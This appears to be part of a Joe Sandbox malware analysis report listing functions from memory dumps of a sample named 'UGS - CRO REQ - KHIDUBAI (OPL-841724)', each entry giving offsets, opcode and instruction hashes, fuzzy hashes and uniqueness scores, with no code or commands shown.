Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d602e6b3a6a36df2ed97b97ff9c4c3b97e1a014286c71e50de6761cf47b321
Instruction ID: 5b6d5a5795e95c13aa00c2ea6ece2331d2f39a2e39a5ecbbb8bab2258510748e
Opcode Fuzzy Hash: 59d602e6b3a6a36df2ed97b97ff9c4c3b97e1a014286c71e50de6761cf47b321
Instruction Fuzzy Hash: 94F082B6300A049F87049F6AD884D8E77F9FF99724320846AF91AC7321DA71EC15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 046AB39F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3036c82ffdfb7137b36e37ff70995e594c48a2d8bbdc3d89d47434ec7b733d3c
Instruction ID: 276fba3ef7ca3b880607968c9b538d8bc9d4058041828a363554619430d00a82
Opcode Fuzzy Hash: 3036c82ffdfb7137b36e37ff70995e594c48a2d8bbdc3d89d47434ec7b733d3c
Instruction Fuzzy Hash: 62F0B435A04608AFCB19CF69D8883DD7FF6EF41210F0584A6D005D3244DB746A86CB44

Uniqueness

Uniqueness Score: -1.00%

Function 001E0848 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66a6a72df31a7c51f7eab7020d3493a1acc45decba0d08a2161862f44d2c5f36
Instruction ID: bbfd7452ef93ea926d62eb2b006775af97a5159d287cc2b306eae273fce6b287
Opcode Fuzzy Hash: 66a6a72df31a7c51f7eab7020d3493a1acc45decba0d08a2161862f44d2c5f36
Instruction Fuzzy Hash: A901FB35E00209DFCB44EBB4D9185EDBBB1EF44306B5044A5D816E7650EF745A85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EFED4B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14211814dc57ce235e857530cafcf3202aeed1027e54b212e8048d6525bab16a
Instruction ID: 4cdf93b9515b228e5d0e49a21b19541cf07bf012b7f967d1bc7eba1daeadc79e
Opcode Fuzzy Hash: 14211814dc57ce235e857530cafcf3202aeed1027e54b212e8048d6525bab16a
Instruction Fuzzy Hash: 7411C574E04268CFCBA5DF64D89479DBBB2FB48300F1082AAD55AA73A4CB745E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01F150B8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18e12cae089756164b87aadd87838f2f76fe8d432f7520b79ef85d97ee7bbdb
Instruction ID: f590b7e31a102b3940bfa789aa4af142130cd5affc748da48d542749d2a4eb9e
Opcode Fuzzy Hash: d18e12cae089756164b87aadd87838f2f76fe8d432f7520b79ef85d97ee7bbdb
Instruction Fuzzy Hash: 37F0BE7580A3449FCB01CFA8D8514A9BF74EB87310F2581EAC9489B366E6334916DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01F1A827 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e81b15f2930f3c7c374e6f6170255fd58f416acebfcf24e039d35e54a91906
Instruction ID: 399af356f9646491d8b60a56498c744078010d2bbea8baed0ff97e0b52613dcb
Opcode Fuzzy Hash: 97e81b15f2930f3c7c374e6f6170255fd58f416acebfcf24e039d35e54a91906
Instruction Fuzzy Hash: D201A970D06389DFDB01CF98D1887AC7BF1FB0A310F804055E10AAB26ACB768988CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01EFE1CD Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dae9b97d785755240baa8dddab3df3ca3c6d3882402b9b71b183f40cfa77da8
Instruction ID: 6142167c1f8120a0e912bc19abb544a06fcf5e9ff8d59616fbe0be5b1b91480a
Opcode Fuzzy Hash: 0dae9b97d785755240baa8dddab3df3ca3c6d3882402b9b71b183f40cfa77da8
Instruction Fuzzy Hash: 57017870A41258CFEB21CF54D888BACBBB2FB48345F4091EAD909A72A0CB741EC5CF00

Uniqueness

Uniqueness Score: -1.00%

Function 046A9CB8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bd2a9b8f9de8fc2565862e4900b75955074ec9ae23e383e7021bb97435d583
Instruction ID: 826a29a07995a785dfa0097d9583dcf2bea6f6177e0bb0873146e3763d410196
Opcode Fuzzy Hash: c4bd2a9b8f9de8fc2565862e4900b75955074ec9ae23e383e7021bb97435d583
Instruction Fuzzy Hash: 74F03A76300B019F87148F29E884C9E77A9BBD9720320816AE916C7320DA70DC15CB50

Uniqueness

Uniqueness Score: -1.00%

Function 058CF1B0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dbbec2562c8d4724b4ee41f6569f241d2a9c0027c47b9978fb0861a931791f3
Instruction ID: a6157b30125fff6cc70bb1f8fc6d6761b81689621e7ed216064458bebfd624ac
Opcode Fuzzy Hash: 4dbbec2562c8d4724b4ee41f6569f241d2a9c0027c47b9978fb0861a931791f3
Instruction Fuzzy Hash: 73F0FE393406019FC714DB69D854D2E77AAFFC9B21B154069FA468B364CB71EC42DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01F14028 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c3fb75bfecb9c8c4a40e911e5478218b8f16697d7566fce5ee99078e6094a0
Instruction ID: 7b5970294a4a584bb65f723a19da9ace8153bd8fb32e78da1738f163bcf76696
Opcode Fuzzy Hash: 11c3fb75bfecb9c8c4a40e911e5478218b8f16697d7566fce5ee99078e6094a0
Instruction Fuzzy Hash: 74F02731C09208DFCB01CF68D8016ACBF78EB86300F0481EEDA0457392D2335A42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 046A69A0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2a3b2adee34b27b54f77b3b4093c6e21559162aff2edfe4113731c5bbceae0
Instruction ID: 71984727e71015f9aa9ac9f3dfebb290478ce5e7cafff59f41e061e76f293845
Opcode Fuzzy Hash: 0f2a3b2adee34b27b54f77b3b4093c6e21559162aff2edfe4113731c5bbceae0
Instruction Fuzzy Hash: DAF0B830D09248EFCB82CFB8D8556DCBFB0EB4A300F0481EAC841AB351E6380A55CF81

Uniqueness

Uniqueness Score: -1.00%

Function 046A80E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707e374d8d395ace4ba028e18d6352e4e79725ba3d8cf7bb29c78d84413f7a16
Instruction ID: 5cd1a075ee19be3dffc49501f2913101f031fd2c8b3a5501695fedb8861a55e3
Opcode Fuzzy Hash: 707e374d8d395ace4ba028e18d6352e4e79725ba3d8cf7bb29c78d84413f7a16
Instruction Fuzzy Hash: 4CF05E34D092889FCB41DFA8D85569CBFF1EB59310F1481EAC858D3382E7795902CF00

Uniqueness

Uniqueness Score: -1.00%

Function 046A7AD8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4953fd0d9ae1190109ddbe61d55cf79c6b10b0607132a05a4c96e8290859d2fc
Instruction ID: ebc355bafe10d9cfa5d05bf27bc713442c2dead037e0bddc01606a610451603d
Opcode Fuzzy Hash: 4953fd0d9ae1190109ddbe61d55cf79c6b10b0607132a05a4c96e8290859d2fc
Instruction Fuzzy Hash: 87F0A0309192849FCB41DFB8C9A16ACBFF4AB0A201F2841EAC848C3792E2365947CF01

Uniqueness

Uniqueness Score: -1.00%

Function 001E0D60 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e708fa34a1e5afe8bccf49ecd58e8dbc395e79106183956ae8eb8062dc01246b
Instruction ID: dfe730a5f0da2ca975e1c898b534865e5ea2df3f9febad5052acf79daf83c4a8
Opcode Fuzzy Hash: e708fa34a1e5afe8bccf49ecd58e8dbc395e79106183956ae8eb8062dc01246b
Instruction Fuzzy Hash: 21F0A0713007009BD314DB6EE99164EF7E2EFCA2157A8C93EE41DD7321EA31E90A8790

Uniqueness

Uniqueness Score: -1.00%

Function 058B24F3 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c31c679e176753db3f27e7db90547d93f84186059b6adc6eaef1858814cdf3
Instruction ID: 1c7416e375ce836ac30c1560f4555ed39defc43547e6c27492b50b9cc80ec6f2
Opcode Fuzzy Hash: 72c31c679e176753db3f27e7db90547d93f84186059b6adc6eaef1858814cdf3
Instruction Fuzzy Hash: 1C01A278A05628CFDB64DF68CC54AD9B7B1FB88701F5041E9940EAB395D7345E818F41

Uniqueness

Uniqueness Score: -1.00%

Function 046A9EC0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c888969a2ca18544746dac25823276ec27b71841c5043935728c52b9fb09f0d9
Instruction ID: 09451866ae21cf9f7f6e386118b9d296ce5e080dfcf6efe8685a7d022bd7c679
Opcode Fuzzy Hash: c888969a2ca18544746dac25823276ec27b71841c5043935728c52b9fb09f0d9
Instruction Fuzzy Hash: 8DE02232A005114BC724CF5CD404AEEB7A6AFC1320B2B843AEE0697201EB71FC5A8BD4

Uniqueness

Uniqueness Score: -1.00%

Function 046A9EB8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b58b9831548415bcee7360cbbce299e9e984a8d714247da308bb4b219748c332
Instruction ID: 5ad18aa724f53e603cb147fdf30206b5cc482546c408379faefb91910948cb6c
Opcode Fuzzy Hash: b58b9831548415bcee7360cbbce299e9e984a8d714247da308bb4b219748c332
Instruction Fuzzy Hash: CCF05531A055000FC714DB4CD4409DF7BA2AFC1310726843AED045B201EB70FC9A8BD4

Uniqueness

Uniqueness Score: -1.00%

Function 046A8B4F Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc072eaa1a1292e25128404d5b722b19aeff18f6a75dc4406061d3a96a8133f
Instruction ID: fc76a2b01bc261cd46cd0f51eae8c8154f570d96ae014beca7834a0adf33d86d
Opcode Fuzzy Hash: ebc072eaa1a1292e25128404d5b722b19aeff18f6a75dc4406061d3a96a8133f
Instruction Fuzzy Hash: 97F0E2B1E0A344AFEB05EB74A81166D7BF1EF92220F1486DFD004CB2C2E5354E0A9B11

Uniqueness

Uniqueness Score: -1.00%

Function 001E0D70 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0492c9a03e82aa535558ff5b5c7a4cdff991d5416bc8167f3d6d925a1bfd03ca
Instruction ID: 07af314d5f792bab928de303dc4ba21d698c1c3264de232f1e6a9c7792ee3e38
Opcode Fuzzy Hash: 0492c9a03e82aa535558ff5b5c7a4cdff991d5416bc8167f3d6d925a1bfd03ca
Instruction Fuzzy Hash: F8E06D713007006B8318DA5ED84281AF7DAEFCA260394C93EE41DD7311DA32ED068790

Uniqueness

Uniqueness Score: -1.00%

Function 01F142A5 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f785574da08fe68165b742f09e65b8831aff6fdd924c59d2d9d1620a521b03d
Instruction ID: 52d941e3afe3997671d48b75078f16e0dadeaa0fc825f449bff75e0d85faf5e1
Opcode Fuzzy Hash: 6f785574da08fe68165b742f09e65b8831aff6fdd924c59d2d9d1620a521b03d
Instruction Fuzzy Hash: 86F03470E05358CFDB59DF69C8847EDBBF5AB98710F108064940DAB288DB708AC1CB00

Uniqueness

Uniqueness Score: -1.00%

Function 01F12F50 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42c5c59cc020db232a9f8925a2d9017b7b0f9a514f7df55509e29deebe78a2c
Instruction ID: 2727f8547436017b23dce5439ec8e5395ac70fd0777529ba00d108ab201b842e
Opcode Fuzzy Hash: d42c5c59cc020db232a9f8925a2d9017b7b0f9a514f7df55509e29deebe78a2c
Instruction Fuzzy Hash: 80F0F235D44208EFCB44CFA8D5906ECBBB4EB9A324F2081AAD80897351D6365E4ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 046A6647 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec466d9084a393e9d66a7c4a4677908e1f2bb906045121e8213d1792fbafe185
Instruction ID: 7fbbe900090883b2f600b735b2f453d8ff68120e14c5158a6b78f3ca7512d8ab
Opcode Fuzzy Hash: ec466d9084a393e9d66a7c4a4677908e1f2bb906045121e8213d1792fbafe185
Instruction Fuzzy Hash: 1EF05E30E49304DFCB01DFB8E45429CBFB1EB4A314F1881EEC88597251E2391951CF01

Uniqueness

Uniqueness Score: -1.00%

Function 046A6ED5 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d75f4a24f7bfd1b8443b881e6db294370072d4fa098a8c330fb3102cd0c3bfef
Instruction ID: e116e61062bb12af3e024890bdd7be03ccaecfde449dad1c2f5d89f8102839c7
Opcode Fuzzy Hash: d75f4a24f7bfd1b8443b881e6db294370072d4fa098a8c330fb3102cd0c3bfef
Instruction Fuzzy Hash: 10F06430A04558CBDB24DF59E980B9CB3B2FB48300F5086B9E10AA3290E7316E81CF00

Uniqueness

Uniqueness Score: -1.00%

Function 058CDE80 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e535fc269e9885543f524b521d5c8c6021584e0f89be535bf511ea7775f04341
Instruction ID: b6939557a45373526a392d15936a794bb9bdf48c4e47a66c6ce7553c816ebc07
Opcode Fuzzy Hash: e535fc269e9885543f524b521d5c8c6021584e0f89be535bf511ea7775f04341
Instruction Fuzzy Hash: B8F0F874905248EFCB80DFA9D950AADBFF8AB49300F14C0EAECA8D3341D6359A51DF50

Uniqueness

Uniqueness Score: -1.00%

Function 01EFC5C9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6345f78a79a7ac0193f7b210aecd5fbf307da2d2dcc79d5d25937e40e8be151
Instruction ID: 3e1b1295c37c358e3c91bc9fbddb453576a5ba377868e83e626bf6e997ab14b8
Opcode Fuzzy Hash: e6345f78a79a7ac0193f7b210aecd5fbf307da2d2dcc79d5d25937e40e8be151
Instruction Fuzzy Hash: F2F06534809208DFCB05CFA4D9999EDBFB4EB4A314F2591DECC0957351C6354945DF41

Uniqueness

Uniqueness Score: -1.00%

Function 046A753B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660d9e73b6a8b2ba42e7b6843bd46ee2995bb779bca875b5a9aee7801e9800ce
Instruction ID: 7cf371e568a2ca70889bb45cd86f083f0e706c00ea057a38ed6f62784b8daf74
Opcode Fuzzy Hash: 660d9e73b6a8b2ba42e7b6843bd46ee2995bb779bca875b5a9aee7801e9800ce
Instruction Fuzzy Hash: DDF0F974A01228CFCB15DF98E994B9CB7B2FB45300F0416A6E505AB391D7356E80CF11

Uniqueness

Uniqueness Score: -1.00%

Function 046A75D7 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52beb571c8c76fa6a4c700581fbc5e0340a1240a22f96b706a272be9cefa3e7
Instruction ID: 7d213361a7b56296cae59273751681c80f591cdb915873c28c0fe5140cf615a3
Opcode Fuzzy Hash: c52beb571c8c76fa6a4c700581fbc5e0340a1240a22f96b706a272be9cefa3e7
Instruction Fuzzy Hash: 50F04434A01218CFCB50DF68E894B9CB7B2FB44300F1442AAE40DAB392DB346E84CF01

Uniqueness

Uniqueness Score: -1.00%

Function 046A7249 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4298c3aac7e8167cb297e39e87cb96c4fc5bc086c2581443a88767b18f45b1f5
Instruction ID: 6064d2e42059997fd83880150a66bb9e22dbcfa374ed33d6522e18f6a32f39a7
Opcode Fuzzy Hash: 4298c3aac7e8167cb297e39e87cb96c4fc5bc086c2581443a88767b18f45b1f5
Instruction Fuzzy Hash: 71F09038A00268CFCB25DF58E884B9CB7B1FB48300F0486A9E44AA7391DB756D95CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01EF6CA0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b799f7ebed7b980d03cc50c42c4b4f0c5071adf6324167446d45fc34a0d3502
Instruction ID: 8777356d1ad9a9e7737d8f141e1773d075ed57685d76179f2e837975c42fd5e8
Opcode Fuzzy Hash: 5b799f7ebed7b980d03cc50c42c4b4f0c5071adf6324167446d45fc34a0d3502
Instruction Fuzzy Hash: 82E06D78D091489FDB04EFA8E5906ACBFB0EB4D314F1482EECC5957341DA314A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 01EF9480 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65998d433091e66f4a4e2f6a3bd30bd91cc22a0315e7a699f48b34809b1487ea
Instruction ID: 003b14bfcb58813a1785fd9f7949a973cbe7359c3ccf969568fcb25444db457c
Opcode Fuzzy Hash: 65998d433091e66f4a4e2f6a3bd30bd91cc22a0315e7a699f48b34809b1487ea
Instruction Fuzzy Hash: 7EE0D838819148DFCB09CF64E9A16ACBF74EF5A314F2452DDDC445B382C6325A46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FF68 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f8a3794447af413f8b6e657286fd9d42f72de25f5450782c7ab3b8659fde27
Instruction ID: 7f42df54249049f6a5113911f1060c3fd5ccb95b6e27924cb38e4cb51b8d199b
Opcode Fuzzy Hash: a6f8a3794447af413f8b6e657286fd9d42f72de25f5450782c7ab3b8659fde27
Instruction Fuzzy Hash: BFF05874D09348EFCB11DFA8D86029CBFB4FB89300F1081AAD84496285D3754A54DB82

Uniqueness

Uniqueness Score: -1.00%

Function 01F1C6B8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9db6175f51dced4d5a902b97e5bce3f67d2c0f7d33fa69b6131a9e2c14c1519
Instruction ID: 26dc7b1fb5c765721b318a6cf097e65916c2fffd893453368ee229596710f811
Opcode Fuzzy Hash: f9db6175f51dced4d5a902b97e5bce3f67d2c0f7d33fa69b6131a9e2c14c1519
Instruction Fuzzy Hash: B4E0923230074A6BC7119A1AE884D4FFB9A9FC02203408D3AD10A87129DE70EC0A8794

Uniqueness

Uniqueness Score: -1.00%

Function 01F13E80 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9288dff32173cc70db851e0e2c8e6dd785220f9470f06a020e9c106103358b19
Instruction ID: 88ed30cae07033bedd7178ace8b4be7799f50603e9d14d4cd5fb1b4a433675d6
Opcode Fuzzy Hash: 9288dff32173cc70db851e0e2c8e6dd785220f9470f06a020e9c106103358b19
Instruction Fuzzy Hash: 7BE0D831908304DBD704CB58D96556CBF74FBC9320F2440EACC0817385C6329E46C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 046ACFD0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc43ce0dbcca9b01d5eeb2a45faaf2b6d0909c5a32fe06571c77848623b9819
Instruction ID: 22ed76dbcc45be84529931e88be07fe1fee2e1e574092d0417faf36e5f6a6276
Opcode Fuzzy Hash: edc43ce0dbcca9b01d5eeb2a45faaf2b6d0909c5a32fe06571c77848623b9819
